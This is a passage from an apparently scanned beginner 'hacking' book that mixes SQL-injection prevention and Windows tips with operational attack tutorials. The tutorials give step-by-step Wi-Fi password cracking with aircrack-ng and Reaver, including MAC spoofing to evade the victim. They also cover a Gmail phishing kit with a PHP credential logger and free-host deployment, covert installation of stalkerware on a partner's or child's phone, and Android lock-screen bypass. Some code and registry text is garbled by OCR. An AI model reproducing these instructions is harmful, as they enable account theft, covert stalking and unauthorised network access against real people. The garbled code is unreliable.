vulnerabilities by avoiding 
these three problems. These 
techniques can be used with 


practically any kind of 
programming language with 
any type of database. 


SQL injection flaws typically 
look like this: 


The following (Java) example is UNSAFE, and would allow an attacker to inject code into the query that would be executed by the database. The unvalidated "customerName" parameter that is simply appended to the query allows an attacker to inject any SQL code they want. Unfortunately, this method for accessing databases is all too common.


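// UNSAFE: the request parameter is concatenated straight into the SQL text.
// Uses java.sql.Statement and java.sql.ResultSet.
String query = "SELECT account_balance FROM user_data WHERE user_name = "
    + request.getParameter("customerName");

try {
    Statement statement = connection.createStatement( ... );
    ResultSet results = statement.executeQuery( query );
}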
PREVENTIONS 


Option 1: Prepared 
Statements (Parameterized 
Queries): 


The use of prepared statements (parameterized queries) is how all developers should first be taught to write database queries. They are simple to write, and easier to understand than dynamic queries. Parameterized queries force the developer to first define all the SQL code, and then pass in each parameter to the query later. This coding style allows the database to distinguish between code and data, regardless of what user input is supplied.

Prepared statements ensure that an attacker is not able to change the intent of a query, even if SQL commands are inserted by an attacker. If an attacker were to enter the user ID ' or '1'='1, the parameterized query would not be vulnerable.
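The difference is easiest to see with both forms run against the same input. The following Python sketch is an added example, not code from the book: it uses an in-memory SQLite database with the user_data table from the Java snippet above, runs the input ' or '1'='1 through a concatenated query and through a parameterized one, and goes one step beyond the text by showing an allow-list for a sort column, since placeholders bind values but not identifiers. The sample rows, the function names and the SORT_COLUMNS mapping are assumptions.

```python
import sqlite3


def make_db():
    """Build an in-memory database with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE user_data (user_name TEXT PRIMARY KEY, account_balance INTEGER)"
    )
    conn.executemany(
        "INSERT INTO user_data VALUES (?, ?)",
        [("alice", 120), ("bob", 75), ("carol", 300)],
    )
    return conn


def balances_unsafe(conn, customer_name):
    # UNSAFE: the input becomes part of the SQL text, so a quote in it
    # changes the structure of the WHERE clause.
    query = (
        "SELECT user_name, account_balance FROM user_data "
        "WHERE user_name = '" + customer_name + "'"
    )
    return conn.execute(query).fetchall()


def balances_safe(conn, customer_name):
    # The SQL text is fixed; the input is bound as a value and is only
    # ever compared against user_name as a literal string.
    query = "SELECT user_name, account_balance FROM user_data WHERE user_name = ?"
    return conn.execute(query, (customer_name,)).fetchall()


# Identifiers cannot be bound with "?", so a caller-chosen sort column is
# translated through a fixed mapping instead of being pasted into the query.
SORT_COLUMNS = {"name": "user_name", "balance": "account_balance"}


def list_accounts(conn, sort_key, min_balance):
    column = SORT_COLUMNS.get(sort_key)
    if column is None:
        raise ValueError("unsupported sort key: %r" % sort_key)
    query = (
        "SELECT user_name, account_balance FROM user_data "
        "WHERE account_balance >= ? ORDER BY " + column
    )
    return conn.execute(query, (min_balance,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    user_id = "' or '1'='1"  # the input quoted in the text above
    print("concatenated :", balances_unsafe(db, user_id))   # every row comes back
    print("parameterized:", balances_safe(db, user_id))     # no row matches
    print("normal lookup:", balances_safe(db, "bob"))
    print("sorted list  :", list_accounts(db, "balance", 100))
```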


2. Use dynamic SQL only if 
absolutely necessary. 


Dynamic SQL can almost 
always be replaced with 
prepared statements, 
parameterized queries, or 
stored procedures. For 
instance, instead of dynamic 
SQL, in Java you can use 
PreparedStatement() with 
bind variables, in .NET you 
can use parameterized 
queries, such as 
SqlCommand() or 
OleDbCommand() with bind 
variables, and in PHP you can 


use PDO with strongly typed 
parameterized queries (using 
bindParam()). 


In addition to prepared 
statements, you can use 
stored procedures. Unlike 
prepared statements, stored 
procedures are kept in the 
database but both require first 
to define the SQL code, and 
then to pass parameters. 


3. Escaping All User Supplied Input


This third technique is to escape user input before putting it in a query. If you are concerned that rewriting your dynamic queries as prepared statements or stored procedures might break your application or adversely affect performance, then this might be the best approach for you. However, this methodology is frail compared to using parameterized queries, and I cannot guarantee it will prevent all SQL Injection in all situations. This technique should only be used, with caution, to retrofit legacy code in a cost-effective way. Applications built from scratch, or applications requiring low risk tolerance, should be built or re-written using parameterized queries.


This technique works like 
this. Each DBMS supports 
one or more character 
escaping schemes specific to 
certain kinds of queries. If 
you then escape all user 
supplied input using the 
proper escaping scheme for 
the database you are using, 
the DBMS will not confuse 
that input with SQL code 
written by the developer, thus 
avoiding any possible SQL 
injection vulnerabilities. 


4. Install patches regularly 
and timely. 


Even if your code doesn't 
have SQL vulnerabilities, 
when the database server, the 
operating system, or the 
development tools you use 
have vulnerabilities, this is 
also risky. This is why you 
should always install patches, 
especially SQL 
vulnerabilities patches, right 
after they become available. 


5. Remove all functionality 
you don't use. 


Database servers are complex beasts and they have much more functionality than you need. As far as security is concerned, more is not better. For instance, the xp_cmdshell extended stored procedure in MS SQL gives access to the shell, and this is just what a hacker dreams of. This is why you should disable this procedure and any other functionality which can easily be misused.


6. Use automated test tools for SQL injections.


Even if developers follow the rules above and do their best to avoid dynamic queries with unsafe user input, you still need to have a procedure to confirm this compliance. There are automated test tools to check for SQL injections and there is no excuse for not using them to check all the code of your database applications.


SQL INJECT 
ME 


TESTING SQL 
INJECTION BY 
USING TOOL 


One of the easiest tools for testing SQL injections is the Firefox extension named SQL Inject ME. After you install the extension, the tool is available in the right-click context menu, as well as from Tools -> Options. The sidebar of SQL Inject ME is shown in the next screenshot and, as you can see, there are many tests you can run:


[Screenshot: the SQL Inject Me sidebar. It lists each form on the page with its fields, lets you fill in good values and mark which fields are to be tested, and offers the buttons "Test all forms with all attacks" and "Test all forms with top attacks".]


You can choose which tests 
to run and which values to 
test. When you press one of 
the Test buttons, the selected 
tests will start. When the tests 
are done, you will see a report 
of how the tests ended. 


There are many options you 
can set for the SQL Inject ME 
extension, as shown in the 
next two pictures: 


[Screenshots: the SQL Inject ME Options dialog. The General tab holds settings such as "Show 'Open Sidebar' in context menu", "Show passed results in final report", the preferred number of attacks to test, the number of tabs to use for testing, and the pause between adding items to the sidebar. The SQL Injection Strings tab lists the test strings and the Result Strings, which are strings found in pages where the result is submitted and signify that the test has FAILED.]


As you see, there are many 
steps you can take in order to 
clean your code from 


potential SQL injection 
vulnerabilities. Don't neglect 
these simple steps because if 
you do, you will compromise 
the security not only of your 
sites but also of all the sites 
that are hosted with your web 
hosting provider. 


WPA2 
TESTING 


WI-FI HACKING 
USING 
BACKTRACK 


After performing the SQL injection, I can bet that you now have endless curiosity to explore more about ethical hacking. According to that need, in this article we are going to perform a hardcore hack using Backtrack Linux: we are going to learn how to crack Wi-Fi using Backtrack. One more thing I want to add here is that all the material I am sharing with you is only for study purposes. If you have black intentions, just leave the book now. If you perform the steps in this article on your computer, you will be responsible for any damage caused by you.


So let’s start the article: 


Now let us start with the Wi- 
Fi cracking. But before 
starting the tutorial let me 
give you a small introduction 
to what Wi-Fi hacking is and 
what is the security protocols 
associated with it. 


In a secured wireless connection, data is sent as encrypted packets. These packets are secured with network keys. There are basically 2 types of security keys:


WEP (Wireless Encryption 
Protocol):- This is the most 
basic form of encryption. 
This has become an unsafe 
option as it is vulnerable and 
can be cracked with relative 


ease. Although this is the case 
many people still use this 
encryption. 

WPA (WI-FI Protected 
Access) : This is the most 
secure wireless encryption. 
Cracking of such network 
requires use of a wordlist 
with common passwords. 
This is sort of brute force 
attack. This is virtually 
uncrackable if the network is 
secured with a strong 
password 


So let's begin the actual Wi-Fi hacking tutorial! In order to crack a Wi-Fi password, you require the following things:


For the Wi-Fi hacking you 
need to install the Backtrack 
on your computer. 


I am assuming that you have 
already installed the 
Backtrack on your pc. If not 
it's very easy to install by 
making bootable live 


CD/DVD. For installing 
processes you can just 
Google it. You will get it 
easily. 




Now open the console from 
the taskbar, Click on the icon 
against the dragon like icon in 
the taskbar in the above 


screenshot. 

You will have a Command 
Prompt like Shell called as 
console terminal. 


1) Let's start by putting our wireless adapter in monitor mode. It allows us to see all of the wireless traffic that passes by us in the air. Type airmon-ng in the console terminal and press Enter. You will have a screen like this; note down the name of the interface, in this case the name is wlan0.


[Screenshot: console output of airmon-ng, listing the wireless interface with its chipset (Intel 5300AGN) and driver (iwlagn - [phy6]).]


2) Now type ifconfig wlan0 down and hit enter.

This command will disable your wireless adapter; we are doing this in order to change your MAC address.

Now, you need to hide your identity so that you will not be identified by the victim. To do this you need to type ifconfig wlan0 hw ether 00:11:22:33:44:55 and hit enter.

This command will change your MAC address to 00:11:22:33:44:55.

3) Now the next step is to type airmon-ng start wlan0 and press enter.

This will start the wireless adapter in monitor mode. Note down the new interface name; it could be eth0 or mon0 or something like that.

The above command in the console has started your network adapter in monitor mode as mon0:


4) Now that our wireless 
adapter is in monitor mode, 


we have the capability to see 
all the wireless traffic that 
passes by in the air. We can 
grab that traffic by simply 
using the airodump-ng 
command. 


This command grabs all the 
traffic that your wireless 
adapter can see and displays 
critical information about it, 
including the BSSID (the 
MAC address of the AP), 
power, number of beacon 


frames, number of data 
frames, channel, speed, 
encryption (if any), and 
finally, the ESSID (what most 
of us refer to as the SSID). 
Let's do this by typing: 


airodump-ng mon0


In the above screenshot there is a list of available networks. Choose one network and note its BSSID and channel.

5.) Type airodump-ng -c channel no --bssid BSSIDNI mon0 -w filename and hit enter.

Replace channel no. and BSSIDNI with the data from step 4. Replace mon0 with the network interface name from step 3. In place of filename write any name and remember it. Better to use filename itself.


This command will begin 
capturing the packets from 
the network. You need to 
capture more and more 
packets in order to crack the 


Wi-Fi password. This packet 
capturing is a slow process. 


6.) To make the packet 
capturing faster, we will use 
another command. Open a 
new shell, don't close the 
previous shell. In new shell 
type aireplay-ng -1 0 -a 
BSSIDNI -h 
00:11:22:33:44:55 mon0 and 
hit enter. 


Replace BSSIDNI with the data from step 4 and mon0 with the interface name from step 3. This command will boost the data capturing process.

The -1 tells the program the specific attack we wish to use, which in this case is fake authentication with the access point. The 0 sets the delay between attacks, -a is the MAC address of the target access point, -h is your wireless adapter's MAC address and the command ends with your wireless adapter's device name.


7.) Now wait for a few minutes and let the DATA in the other console reach a count of 5000.


8.) After it reaches 5000, 
open another console and 


type aircrack-ng filename- 
01.cap and hit enter. 

Replace the filename with the 
name you used in step 5. Add 
-01.cap to it. .cap is the 
extension of file having 
captured data packets. After 
typing this command, 
aircrack will start trying to 
crack the Wi-Fi password. If 
the encryption used is WEP, 
it will surely crack the 
password within few minutes. 


In case of WPA use the following command instead of the above: aircrack-ng -w /pentest/wireless/aircrack-ng/test/password.lst -b BSSIDNI filename-01.cap


Replace BSSIDNI and 
filename with data you used. 
/pentest/wireless/aircrack- 
ng/test/password.lst is the 
address of a file having 
wordlist of popular 
passwords. In case of WPA 


aircrack will try to brute force 
the password. As I explained 
above that to crack WPA you 
need a file having passwords 
to crack the encryption. If 
you are lucky enough and the 
network owner is not smart 
enough, you will get the 
password. 


PREVENTION: 


For the prevention from being 
hacked you can refer to the 
chapter 


“PASSWORD CREATING 
POLICIES”. 


NEWBIE’S WAY 
TOWARDS 
REVERSE 
ENGINEERING 


Nowadays people expect more from an application than what is provided by the developers. People want to use a specific application according to their own preferences. So now we are here with an article on the topic of reverse engineering. Let's start with simple engineering: "simple engineering" is the task of developing/building something, BUT reverse engineering refers to the task of redeveloping/re-building something. In simple words, reverse engineering is the task of modifying the source code of the application to make it work according to our way. Reverse engineering is a very complicated topic and is very difficult for beginners to understand, as it requires prior knowledge of assembly language.


Developing is easy, but re-developing is not easy! While developing, a programmer has to deal with functions, pointers, conditions, loops etc. But during the decompilation process we need to deal with registers!


Generally 32 bit / 64 bit Windows supports mainly 9 registers:


Performing Registers

> EAX : Extended Accumulator Register
> EBX : Base Register
> ECX : Counter Register
> EDX : Data Register


Index

> ESI : Source Index
> EDI : Destination Index


Pointer

> EBP : Base Pointer
> ESP : Stack Pointer
> EIP : Instruction Pointer


So , let’s move towards our 
way “How to modify the 
applications” 

The general requirements you 
need for the modification are 
listed below and easily 
available on the internet: — 
1. OllyDBG

2. Crack Me App (click here to download) (register and activate your account before download)

PROCESS:


When you have downloaded 
both the apps ,first of all you 
need to launch the Crack Me 
App. 

It will ask you to enter the 
password, enter any password 


Now it will show you the 
error that “You are not 


authorized to use the 
application". 


[Screenshot: the "Password" app for crackmes.de by R.Holland (2007) showing the message "You are not authorized to use the application."]


Now open the OllyDBG and 
open the Crack me app in it. 
When you have opened the 
Crack me app in 
OllyDBG,now in the upper 


left box, while scrolling up 
you find the statement like 
this:- JE SHORT 
Password.00457728 


Basically, this is a conditional jump: if the condition is true it will jump to 00457728, which shows us the message "You are not authorized to use the application", and if the condition is not true it just continues reading the code. So we don't need this jump to work, as we don't want to get the error message.


Now, to remove the error message, we can change JE SHORT Password.00457728 to JNE SHORT Password.00457728. JNE (Jump If Not Equal) means that if the password is correct it will give you the error message and if the password is incorrect it will give you the correct message.


For changing the query just 
double click the line JE 
SHORT Password.00457728 
and simply change it to JNE 
SHORT Password.00457728 


and Hit on “Assemble”. 


Now HIT on blue “PLAY” 
button in the upper side of the 
OllyDBG to start the Crack 
me app again and enter the 
password then it will give you 
the correct message. 


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PHISHING 
ATTACK AHEAD 




EMAIL AND 
FACEBOOK 
HACKING BY 
PHISHING 


What is phishing? 


Phishing is an attempt by the sender to have the receiver of the email release their personal information, i.e. the attacker lures the victims into giving up some confidential information.


Why phishing? 


There are many password 
cracking tools that are 
coming and going into/from 
the market. But phishing is 
the most efficient method to 
steal confidential information 
like, passwords, Credit card 
numbers, Bank account 
numbers etc. 


How phishing works? 


It works just like normal fishing.

A fisherman generally throws bait into the water to lure the fish. Then a fish comes to take the food, feeling that it is legitimate. When it bites the bait, it will be caught by the hook. Now the fisherman pulls out the fish.


In the same way, the hacker 


sends a fake login page to the 
victim. The victim thinks that 
it is a legitimate one and 
enters his confidential 
information. Now the data 
will be with the hacker. 

Now, let’s learn how to hack 
by phishing: 

I am selecting Gmail account 
to be hacked by phishing. 


For phishing you need the 
following stuffs: 
First of all you have to open 


the gamil.com by your 
browser and when page open 
completely „just give a right 
click on the page and a 
dialogue box will opens after 
you having an option “view 
page source" in it. 

Clickon the *view page 
source" option and you see 
that the source code of that 
page will opens after you. 
Then press ctrl+F to open the 
text/word finding box. 

Type “action=” and replace 


it with anything.php 

Such as “action=mail.php” 
Then find for the 

“method=” and also replace it 
with "get". Such as 
method-"get". 


Then save the file by 
anything.html Such as 
"Gmail.html" 

Then create a blank notepad 
file “log.txt” 

The again open the notepad 
and type the following codes: 


<?php 

header("Location: 
http://www.Gmail.com"); 
$handle = fopen("logs.txt", 
"а"); 

foreach($ GET as $variable 
=> $value) 1 fwrite(Shandle, 
$variable); 

fwrite(Shandle, "="); 
fwrite($handle, $value); 
fwrite($handle, "\r\n"); 


j 
fwrite($handle, "\r\n"); 
fclose($handle); exit; 


2» 


Andsave it as “mail.php” 
(save this file by same name 
as you have replaced the 
"action-") 

Now finally you have the 
three files which are required 
for the phishing. 

1) Gmail.html (fake login 
page) 

2) mail.php (to capture the 
login details) 

3) log.txt (to store the 


captured details) 


Procedure: 

stepl: create an account in 
any free web hosting site like 
www.bythost.com 
www.000webhost.com 
WWW.ripway.com 
www.my3gb.com 


step2: Now upload all the 
three files you have 
downloaded.(I have taken 
www.my3gb.com) 


step 3: Give the link of the 
fake page to your victim. 


eg: 
www. yoursitename.my3 gb.co: 
Step 4: when he clicks the 
link, it opens a fake Gmail 
page where he enters his 
login details. When he clicks 
sign in button, his login 


details will be stored in 
log.txt file. 
Demonstration: 


Here I have uploaded my 
scripts on to 
www.my3gb.com 


And copy the Gmail.html link 
which you have to send the 
victim. I clicked the 
Gmail.html link 

A fake page was opened 
where I entered my login 
details. 




This page looks exactly like the original Gmail login page, so the victim enters his/her login details to log in to his/her account. 

This time the victim is redirected to the original Gmail login website. 

The victim will not even know that his/her account got hacked. The victim will think that the page reloaded due to internet errors, login mistakes, etc. 


Now his/her login details 
were captured by the php 
script and stored in log.txt file 
as shown in the figure below: 


In the same way you can hack 
FACEBOOK accounts and 
other social networking 
accounts. 

How to protect ourselves from phishing? 

Don’t use links 

Be suspicious of any e-mail with urgent requests 

By using secured websites 

Using efficient browsers 

Using Antivirus or internet security software. 
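
The fake page described in this chapter differs from the genuine one in where its login form submits (a script on the hosting site) and how (GET, so the credentials travel in the URL). The check below is an added example, not part of the original book: it audits a saved login page for exactly those signs. The host names, the trusted-host list and both sample pages are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class FormCollector(HTMLParser):
    """Record every <form>: its action, its method, and whether it holds a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._open = None  # form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        attr = {name: (value or "") for name, value in attrs}
        if tag == "form":
            self._open = {
                "action": attr.get("action", ""),
                "method": (attr.get("method") or "get").lower(),  # HTML default is GET
                "has_password": False,
            }
            self.forms.append(self._open)
        elif tag == "input" and self._open is not None:
            if attr.get("type", "").lower() == "password":
                self._open["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None


def audit_login_page(html, page_url, trusted_hosts):
    """Return (code, detail) findings for every form that collects a password."""
    collector = FormCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for form in collector.forms:
        if not form["has_password"]:
            continue
        # A relative action such as "mail.php" resolves against the page's own host.
        target = urljoin(page_url, form["action"])
        parts = urlsplit(target)
        host = (parts.hostname or "").lower()
        if host not in trusted_hosts:  # exact match, so look-alike hosts fail too
            findings.append(("untrusted-target", host))
        if parts.scheme != "https":
            findings.append(("no-tls", parts.scheme))
        if form["method"] != "post":
            findings.append(("password-in-url", form["method"]))
    return findings


# Constructed sample pages (not real captures).
TRUSTED = {"accounts.example.com"}

GENUINE = """
<form action="/signin" method="post">
  <input type="email" name="Email"><input type="password" name="Passwd">
</form>"""

CLONE = """
<form action="mail.php" method="get">
  <input type="email" name="Email"><input type="password" name="Passwd">
</form>"""

if __name__ == "__main__":
    for label, html, url in [
        ("genuine", GENUINE, "https://accounts.example.com/login"),
        ("clone", CLONE, "http://yoursitename.hosting.example/Gmail.html"),
    ]:
        print(label, audit_login_page(html, url, TRUSTED))
```

The same function can be run over pages reported by users or collected by a mail gateway; a password form that submits anywhere outside the trusted list is the finding that matters most.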


USB 
SECURITY 


Securing Pen Drives 
From Malicious 
Viruses 


Today, a big problem for Windows users is securing their data from viruses. This is especially true of pen drives: nobody wants to keep vital data on pen drives, because pen drives are portable devices, and through sharing data they may get infected by viruses such as the shortcut virus, Autorun.inf, the new folder virus, etc. Some people recover their data simply by using Command Prompt, but some people assume there is only one option left, which is to format the pen drive. 

So, if your pen drive is infected by any of those viruses, you can simply follow these steps to get your hidden data back. 


Open CMD (Command Prompt). 

Open the flash drive in CMD (if your drive is ‘G’, then enter ‘G:’ after c:\user\ and press [ENTER]). 

Now type following 
command and hit enter: 

attrib -s -h /s /d 


Now open your pen drive in Windows and you will see all of your files. But wait! Is that enough? No way! Your pen drive is still not totally secure. The above command simply shows all of your files that were hidden by viruses. If you want to shield your USB drive from getting unwanted files, i.e. viruses, worms, spyware, Trojans, etc., then you need to follow these steps. 

What I’m going to tell you is how to set up your registry to stop a computer from saving files to your USB drive. If you have Windows 7 or Windows 8, you can disable the write option for USB drives. This trick is very useful if you have a virus on your laptop and want to copy files from a USB drive but don’t want to transfer the virus to the USB drive. Follow the given steps to disable the USB write option: 


Open Notepad and copy and paste the following: 


Windows registry Editor 
Version 5.00 

[HKEY LOCAL MACHINE 
evicePolicies] 


“WriteProtect”=dword:00000( 
Now save the file with the extension “.reg”. 

Click on the file you just saved. In the pop-up window select Yes and then OK. 

That’s it, your USB is now secure. 

TURNING THE 
SECURITY OFF 


To turn off this security measure: 

Open notepad and copy and 
paste the following: 
Windows Registry Editor 
Version 5.00 


[HKEY LOCAL MACHINE 
evicePolicies] 
“WriteProtect”=dword:00000( 


Now save the file with the extension “.reg”. Click on the file you just saved. In the pop-up window click Yes and then OK. That’s it, your defense is now disabled. 


PDF 
SECURITY 


HOW TO 
PROTECT YOUR 
PDF FILES FROM 
COPYING 


These days it’s a big deal to secure your PDF documents. In this article I will show you “HOW TO PROTECT YOUR PDF FILES FROM BEING COPIED FOR PIRACY AND OTHER MALICIOUS INTENTIONS”. 

To protect your PDF files you can use a tool, “A-PDF Password Security”. You can set a password and prevent people from copying and pasting PDF contents. Here is an easy tutorial on the use of that tool. 


Install the “A-PDF 
password security”. 
Launch the program and 
open the password protect 
wizard. 


[Screenshot: A-PDF Password Security wizard offering the modes “Single PDF Document Security” and “Batch PDF Documents Security”.] 


Select the option “single pdf document security” and push the button “next>”. 

Click the “browse” button to open the PDF file that will be encrypted, then select the security level and encryption method. You can set up passwords for opening and for modification of your document. 


[Screenshot: A-PDF Password Security, Security Setting dialog. Security level: high (256-bit AES; Acrobat 9.0 and above); a document open password and a permissions password are set; printing allowed: none; changes allowed: none.] 


Click “save” or “save as” to 
set a document open 
password and disallow 
copying permission. 




After saving the file you can choose to open the saved PDF file with the default PDF viewer, set another PDF file’s security, or open the destination folder in Windows Explorer. 


Open the saved PDF file with the default PDF viewer. 


NOTIFY ME 


SENDING A 
MESSAGE TO 
OTHER USER IN 
YOUR PC 


In this article we are going to learn how to send a message to another user account on your own PC. 

Let’s assume you want to leave a message for your brother and sister, who have user accounts on the same PC on which you also have a user account. 

So follow these steps to pass a message to another user account at his next login. 


Open the Task Manager of your PC by pressing the CTRL+ALT+DEL keys simultaneously. 

Then click on the Users option to view the available user accounts on your PC. 

Select the user account to which you want to pass the message. 

Then click on the “send message” option placed in the lower right corner. 

A dialogue box will open. 

Type any message you want to convey to them. 

If you want to shock them 
then you can type “HELLO 
USER... YOUR COMPUTER 


IS INFECTED BY 
TROJAN” 


And when the other user logs in to his/her user account, the same message will be displayed to him. 


“I AM A FOLDER I 
DON’T HAVE A 
NAME” 
HOW TO CREATE 


A FOLDER WITH 
EMPTY NAME 


This is the most interesting article of this book, and here I will show you how to create a folder without naming it. Sometimes it will be very useful for you. 

Let’s assume you have simply hidden a folder. When you search for it by name from the address bar, it will be opened easily. So think: if there is a folder without a name, how can it be possible to search for it from the address bar or search box? 

So follow these steps to create a folder without a name: 

Open the location where you want to create the folder. 

Just right click anywhere to create the folder. 

When it asks you to rename the folder, press the ALT key and, while holding the ALT key down, press “2, 5, 5” one by one. 

And then press Enter. 

You will find that it creates a folder without any name. 


SPYING WITH 
ANDROID 


HACKING 
ANDROID PHONE 


Hello friends, now in this 
article we will learn that how 
to spy over an android phone. 
Now these days are the era of 
smart phones based on 


android specially. In this 
article I will show you that 
how to get the details of the 
victim by spying over 
victim’s android phone. This 
is the best way to keep 
tracking your child and also 
your girlfriends. 


For spying now I am using a 
tool name as THE TRUTH 
SPY. 




By using this tool you can 
easily keep tracking the 
victim’s android phone. 


I am showing you the screen 
shots of those things which 
we can spy from an android 
phone...such as CALL 
HISTORY, WHATSAPP 
MESSAGES, and SMS 
DETAILS etc. ...list is shown 
below in the screenshot. 


Note:- this tool is also 
available for IOS devices. 


You have to follow the steps 
to start spying. 


First of all you have to 
download the apk file of this 
tool and install it on the 
victim’s android phone and 
log into it. 

This tool is only of 800kb so 
you can easily manage it 


within seconds. 

A very interesting thing is 
about this tool 1s that you can 
also hide this tool from the 
victims android phone.so that 
victim will not aware about it. 
Now you can download the 
apk file from the website 
(my.thetruthspy.com). 

After installing the app go on 
the same website of the app 
by your computer and resister 
using your email id and login 
to view the details of the 


victim’s android phone. 

For getting details get ensure 
that the data connection of the 
victims phone should be ON. 
When you want to unhide 
the app from the victim’s 
phone just make a call from 
the victim’s phone to #2013*. 


Note: - sometimes this 
"thetruthspy" is stop 
working.so you can also 
search any other spy tool by 
simple Google searches. You 


will find a lot of tools like 
this and have almost same 
functioning. 


MOBILE: “I 
CAN 
CONTROL 
YOUR PC” 


FULL CONTROL 
YOUR PC BY 
PHONE 


Now I have a very interesting thing for you. I know you got tired of the difficult hacking chapters above. 

In this article I am going to tell you how to fully control your computer from your mobile phone. It’s a very interesting thing if you are tired of using the track pad and keyboard of your computer. 

So let’s see how to do it: 

In this article I am going to use a tool named UNIFIED REMOTE, which is used to remotely control our PC. 

Unified Remote is an app that lets you control your entire Windows computer from your Android device. It turns your device into a Wi-Fi or Bluetooth remote control for all the programs on your computer. With this app you can control a wide range of applications, including simple mouse and keyboard, media players and other external gadgets that can be connected to your computer (such as USB-UIRT and TellStick). It even provides extensive capabilities for users to create their own custom remotes for their needs. 

You have to follow these simple steps to remotely control your PC with Unified Remote: 

Download and install the Unified Remote server on your computer (Windows). You can easily find it with a Google search. When you have installed it, launch it. 

Connect your Android phone to the same Wi-Fi network as your computer. Alternatively, if your computer is Bluetooth ready, pair it with your phone. 

Download and install the apk file of Unified Remote from the Play Store. 

At launch, confirm that you have installed the server. 

Then add a new server, select “automatic” and the app will find your computer. 

Tap your computer’s name to connect. 

Now you are ready to start controlling your computer with your phone. 

Tap remote in the app. 


The “Basic input” remote will bring up the mouse, which you can use as a track pad. 

Instructions for using the mouse will appear on screen. There are also a lot of other options available by which you can control your computer in different ways. 

Example: keyboard control, file manager, media, power, start, YouTube, etc. 


LAUNCH GOD 
MODE 


LAUNCHING 
WINDOWS GOD 
MODE 


Here I have a nice Windows trick for you which saves you a lot of time. In this article we will learn how to launch GOD MODE on your computer. 

Windows God Mode is a simple way to get centralized access to all the administrative options that are normally seen inside Control Panel, through a newly created folder which can be placed anywhere on the computer. Usually the administrative options are scattered inside Control Panel, arranged in different categories and subcategories. Windows God Mode arranges all the administrative options inside one single window. You will find it much more neatly arranged and user friendly. 

Let’s see how to launch God Mode in simple steps: 

You need to create a new folder for this. 

Right click in the window where you want to create a new folder. When it asks you to rename that folder, enter the following code after any word. 

Example: Ujjwal.{ED7BA470-8E54-465E-825C-99712043E01C} 

Or 

Saurabh.{ED7BA470-8E54-465E-825C-99712043E01C} 

Or 

Anything.{ED7BA470-8E54-465E-825C-99712043E01C} 

Don’t forget to use curly brackets. 

After renaming the folder press Enter. 




And you will see that the icon of that folder changes, and when you open it you will find all the settings neatly arranged in it. 


CRACKING 
LOCKSCREEN 


HOW TO CRACK 
ANDROID LOCK 
SCREEN 


In this article we are going to 
learn that how to bypass the 
android lock screen. 


We are going to bypass the 
lock screen using a tool name 
as Aroma File manager. 


This is the best method for 
crack android pattern lock; 
you must have custom 
recovery installed on your 
device in order to use this 
method. Let’s start the 
cracking android lock screen. 


First of all download Aroma 
File manager zip file. Google 
it and you will find it easily. 


Now copy this Aroma file 


manager zip to root of your 
SD card. After copying zip 
file to SD, boot your phone 
into Recovery mode (Each 
phone has different key 
combination to boot up in 
recovery mode, you can 
search it on Google). 


In recovery choose “install 
zip from SD card or apply 
update from SD card", now 
select Aroma.zip which you 
have downloaded earlier. 


After installing or updating 
Aroma file manager will 
open, use volume up and 
down keys for Scrolling as 
you do in recovery. 

In Aroma file manager go to 
menu which is located at 
bottom strip after clicking 
menu select settings. Go to 
bottom in settings and then 
select “mount all partitions in 
startup" after mounting exit 
Aroma file manager. 

Now launch Aroma file 


manager again. 

In aroma Go to 
Data>>System. 

You will find “Gesture.key” 
if you have applied gesture 
lock or “Password.key” if you 
have applied password. 


Long press “Gesture.key” or 
"Password.key" which one is 
available, after long pressing 
it will prompt some option, 
choose delete and delete that 
file and restart your 


device(first exit from aroma 
file manager then restart your 
phone). 


Yuppie! Your phone is 
unlocked now. After 
rebooting it will ask you for 
lock pattern don’t worry now 
you can use any pattern, your 
old pattern has gone away. 


REAVER 
BACKTRACK 


WI-FI CRACKING 
USING REAVER IN 
BACKTRACK 


Well, in this article I will 
show you that how to crack 
WPA2-PSK key using a tool 
names as REAVER. Reaver 


use to crack the key by brute 
force method. 


Let’s see how to crack the 
key using Backtrack. 
Now I am using Backtrack 
Sr3. 

So open the console and 
follow the given steps: 

First thing is to do is run the 
command : 
Airmon-ng start wlanO 


Now the next command to 
write 15: 


Airodump-ng wlanO 

With this command we look 
for available networks and 
information regarding 
BSSID, PWR Beacons, data, 


channel etc... 


Now you need to run the 
following code: 

Reaver -i monO0 -b -c BSSID 
—c channel network name 
Note: - Use the values of 
BSSID channel and network 
name in the above command. 


I have executed the command 
and it starts to work as shown 
in the picture below: 


Now you have to wait, time 
taken is dependent on the 


strength of password and the 
speed of your internet 
connection, 


And finally after brute 
forcing it will give you the 
WPA2 pin. 


WINDOWS 
SHORTCUTS 


SOME USEFUL 
WINDOWS 
SHORTCUTS 


1. Windows Key + Tab: Aero 
2. Windows Key + E: Launches Windows Explorer 
3. Windows Key + R: Run Command box 
4. Windows Key + F: Search 
5. Windows Key + X: Mobility Center 
6. Windows Key + L: Lock Computer 
7. Windows Key + U: Ease of Access box 
8. Windows Key + P: Projector 
9. Windows Key + T: Cycle Super Taskbar Items 
10. Windows Key + S: OneNote Screen Clipping Tool 
11. Windows Key + M: Minimize All Windows 
12. Windows Key + D: Show/Hide Desktop 
13. Windows Key + Up: Maximize Current Window 
14. Windows Key + Down: Restore Down / Minimize 
15. Windows Key + Left: Tile Current Window to the Left 
16. Windows Key + Right: Tile Current Windows Right 
17. Windows Key + # (any number) 
18. Windows Key + =: Magnifier 
19. Windows Key + plus: Zoom in 
20. Windows Key + Minus: Zooms out 
21. Windows Key + Space: Peek at the desktop 


DATA 
FORENSICS 


HOW TO 
RECOVER 
PERMANENTLY 
DELETED FILES 


In this article we will learn how to recover permanently deleted files from our computer. Sometimes your important data is accidentally deleted from your computer as well as from the Recycle Bin, and it’s very important to recover that file or data. 

So here I am using a tool named “Stellar Phoenix Windows Data Recovery” to recover the permanently deleted files. 

By using this tool you can recover accidentally deleted data from your computer. 

To do so, follow the simple steps mentioned below: 

Click on the option “deleted file recovery” or “folder recovery” according to your choice. 

Then choose the local drive which you want to scan for the deleted files/folders. 

Then it asks you for a quick scan or deep scan; you can choose according to your need. 


